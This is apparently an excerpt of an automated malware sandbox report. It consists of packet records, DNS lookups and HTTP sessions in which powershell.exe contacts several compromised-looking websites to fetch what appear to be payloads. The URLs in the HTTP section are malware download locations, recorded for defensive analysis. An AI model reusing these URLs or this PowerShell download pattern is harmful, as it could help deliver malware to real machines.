                                                                    Jan 26, 2021 06:54:58.536109924 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.536324024 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.536367893 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.536406994 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.536444902 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.536458969 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.536484957 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.536523104 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.536530972 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.536570072 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.536612988 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.536652088 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.536658049 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.536729097 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.537128925 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.537172079 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.537209034 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.537249088 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.537250996 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.537286043 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.537329912 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.537333965 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.537378073 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.537444115 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.537482023 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.537492037 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.537558079 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.538122892 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.538167000 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.538207054 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.538245916 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.538265944 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.538285017 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.538331032 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.538331985 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.538376093 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.538414955 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.538424015 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.538454056 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.538500071 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.538527012 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.539117098 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.539160967 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.539199114 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.539246082 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.539248943 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.539289951 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.539292097 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.539329052 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.539366961 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.539406061 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.539410114 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.539443016 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.539520979 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.540062904 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.540509939 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.571484089 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.571556091 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.571593046 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.571630955 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.571669102 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.571718931 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.571728945 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.571759939 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.571762085 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.571800947 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.571815014 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.571841002 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.571882010 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.571885109 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.571921110 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.571959019 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.571959019 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.571993113 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.572035074 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.572041988 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.572089911 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.572129965 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.572170973 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.572175026 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.572211027 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.572248936 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.572288036 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.572294950 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.572324991 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.572375059 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.572412014 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.573074102 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.573118925 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.573158026 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.573196888 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.573200941 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.573236942 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.573275089 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.573312998 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.573316097 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.573350906 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.573429108 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.573430061 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.674129963 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.674175978 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.674213886 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.674252033 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.674261093 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.674290895 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.674319029 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.674326897 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.674406052 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.674966097 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.675005913 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.675052881 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.675096035 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.675097942 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.675132990 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.675172091 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.675209999 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.675220013 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.675246954 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.675281048 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.675286055 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.675945997 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.675985098 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676032066 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.676033020 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676083088 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676105022 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.676122904 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676162004 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676196098 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676233053 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.676280022 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.676703930 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676753044 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676794052 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676831961 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676872015 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676873922 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.676909924 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676947117 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.676981926 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.676985025 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.677022934 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.677052975 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.677642107 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.677690029 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.677714109 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.677731991 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.677761078 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.677798986 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.678311110 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.685700893 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.685746908 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.685784101 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.685830116 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.685830116 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.685873985 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.685905933 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.685909986 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.685949087 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.685983896 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.685986042 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686022043 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686059952 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.686098099 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686146021 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686166048 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.686187983 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686216116 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686254978 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.686491013 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686533928 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686573982 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686604977 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.686611891 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686650991 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686676979 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.686687946 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686736107 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686759949 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.686779022 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686816931 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.686852932 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.687458038 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.687500000 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.687536001 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.687572002 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.687575102 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.687613964 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.687649012 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.687676907 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.687686920 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.687726974 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.687747002 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.687773943 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.688122988 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.688436031 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.688477039 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.688517094 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.688522100 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.688555956 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.688566923 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.688595057 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.688631058 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.688633919 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.688673019 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.688719988 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.688752890 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.688757896 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.689842939 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.906160116 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:59.306663990 CET49169443192.168.2.22212.227.200.73
                                                                    Jan 26, 2021 06:54:59.306679010 CET4916780192.168.2.2245.138.97.75
                                                                    Jan 26, 2021 06:54:59.306695938 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:59.306799889 CET4916880192.168.2.22212.227.200.73
                                                                    Jan 26, 2021 06:54:59.307090998 CET49166443192.168.2.22104.21.88.166
                                                                    Jan 26, 2021 06:54:59.307322025 CET4916580192.168.2.22172.217.6.174

                                                                    UDP Packets


                                                                    DNS Queries

                                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                    Jan 26, 2021 06:54:56.107897043 CET | 192.168.2.22 | 8.8.8.8 | 0x80ac | Standard query (0) | nightlifemumbai.club | A (IP address) | IN (0x0001)
                                                                    Jan 26, 2021 06:54:56.445627928 CET | 192.168.2.22 | 8.8.8.8 | 0xd577 | Standard query (0) | shop.nowfal.dev | A (IP address) | IN (0x0001)
                                                                    Jan 26, 2021 06:54:56.809792995 CET | 192.168.2.22 | 8.8.8.8 | 0xc52c | Standard query (0) | e-wdesign.eu | A (IP address) | IN (0x0001)
                                                                    Jan 26, 2021 06:54:56.893301964 CET | 192.168.2.22 | 8.8.8.8 | 0x70c0 | Standard query (0) | traumfrauen-ukraine.de | A (IP address) | IN (0x0001)
                                                                    Jan 26, 2021 06:54:57.039805889 CET | 192.168.2.22 | 8.8.8.8 | 0x3714 | Standard query (0) | traumfrauen-ukraine.de | A (IP address) | IN (0x0001)
                                                                    Jan 26, 2021 06:54:57.271550894 CET | 192.168.2.22 | 8.8.8.8 | 0xa6ed | Standard query (0) | jflmktg.wpcomstaging.com | A (IP address) | IN (0x0001)

                                                                    DNS Answers

                                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                    Jan 26, 2021 06:54:56.141604900 CET | 8.8.8.8 | 192.168.2.22 | 0x80ac | No error (0) | nightlifemumbai.club | | 172.217.6.174 | A (IP address) | IN (0x0001)
                                                                    Jan 26, 2021 06:54:56.468636036 CET | 8.8.8.8 | 192.168.2.22 | 0xd577 | No error (0) | shop.nowfal.dev | | 104.21.88.166 | A (IP address) | IN (0x0001)
                                                                    Jan 26, 2021 06:54:56.468636036 CET | 8.8.8.8 | 192.168.2.22 | 0xd577 | No error (0) | shop.nowfal.dev | | 172.67.151.106 | A (IP address) | IN (0x0001)
                                                                    Jan 26, 2021 06:54:56.848565102 CET | 8.8.8.8 | 192.168.2.22 | 0xc52c | No error (0) | e-wdesign.eu | | 45.138.97.75 | A (IP address) | IN (0x0001)
                                                                    Jan 26, 2021 06:54:56.937766075 CET | 8.8.8.8 | 192.168.2.22 | 0x70c0 | No error (0) | traumfrauen-ukraine.de | | 212.227.200.73 | A (IP address) | IN (0x0001)
                                                                    Jan 26, 2021 06:54:57.073834896 CET | 8.8.8.8 | 192.168.2.22 | 0x3714 | No error (0) | traumfrauen-ukraine.de | | 212.227.200.73 | A (IP address) | IN (0x0001)
                                                                    Jan 26, 2021 06:54:57.302871943 CET | 8.8.8.8 | 192.168.2.22 | 0xa6ed | No error (0) | jflmktg.wpcomstaging.com | | 192.0.78.20 | A (IP address) | IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • nightlifemumbai.club
                                                                    • e-wdesign.eu
                                                                    • traumfrauen-ukraine.de

                                                                    HTTP Packets

                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    0 | 192.168.2.22 | 49165 | 172.217.6.174 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Jan 26, 2021 06:54:56.291138887 CET | 0 | OUT | GET /x/0wBD3/ HTTP/1.1
                                                                    Host: nightlifemumbai.club
                                                                    Connection: Keep-Alive
                                                                    Jan 26, 2021 06:54:56.420243025 CET | 1 | IN | HTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Referrer-Policy: no-referrer
                                                                    Content-Length: 1569
                                                                    Date: Tue, 26 Jan 2021 05:54:56 GMT
                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                    Jan 26, 2021 06:54:56.420275927 CET | 2 | IN |
                                                                    Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    1 | 192.168.2.22 | 49167 | 45.138.97.75 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Jan 26, 2021 06:54:56.864958048 CET | 12 | OUT | GET /wp-content/bn1IgDejh/ HTTP/1.1
                                                                    Host: e-wdesign.eu
                                                                    Connection: Keep-Alive
                                                                    Jan 26, 2021 06:54:56.882874966 CET | 13 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Tue, 26 Jan 2021 05:54:56 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                                                    Jan 26, 2021 06:54:57.097547054 CET | 15 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Tue, 26 Jan 2021 05:54:56 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    2 | 192.168.2.22 | 49168 | 212.227.200.73 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Jan 26, 2021 06:54:56.959074974 CET | 13 | OUT | GET /bin/JyeS/ HTTP/1.1
                                                                    Host: traumfrauen-ukraine.de
                                                                    Connection: Keep-Alive
                                                                    Jan 26, 2021 06:54:57.029058933 CET | 14 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Server: nginx
                                                                    Date: Tue, 26 Jan 2021 05:54:47 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/7.4.14
                                                                    P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                    Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    Pragma: no-cache
                                                                    Set-Cookie: 4bf06e271745b22ffd3a18c8d5fc8b33=9u352km2ddacitncl2qp0nh4fi; path=/; secure; HttpOnly
                                                                    X-Content-Type-Options: nosniff
                                                                    Location: https://traumfrauen-ukraine.de/bin/JyeS/
                                                                    Last-Modified: Tue, 26 Jan 2021 05:54:47 GMT
                                                                    X-Powered-By: PleskLin
                                                                    Jan 26, 2021 06:54:57.248837948 CET | 20 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Server: nginx
                                                                    Date: Tue, 26 Jan 2021 05:54:47 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/7.4.14
                                                                    P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                    Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    Pragma: no-cache
                                                                    Set-Cookie: 4bf06e271745b22ffd3a18c8d5fc8b33=9u352km2ddacitncl2qp0nh4fi; path=/; secure; HttpOnly
                                                                    X-Content-Type-Options: nosniff
                                                                    Location: https://traumfrauen-ukraine.de/bin/JyeS/
                                                                    Last-Modified: Tue, 26 Jan 2021 05:54:47 GMT
                                                                    X-Powered-By: PleskLin


                                                                    HTTPS Packets

                                                                    Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
                                                                    Jan 26, 2021 06:54:56.514801025 CET | 104.21.88.166 | 443 | 192.168.2.22 | 49166 | CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Sat Aug 01 02:00:00 CEST 2020 | Sun Aug 01 14:00:00 CEST 2021 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0 | 05af1f5ca1b87cc9cc9b25185115607d
                                                                     |  |  |  |  | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025 |  |
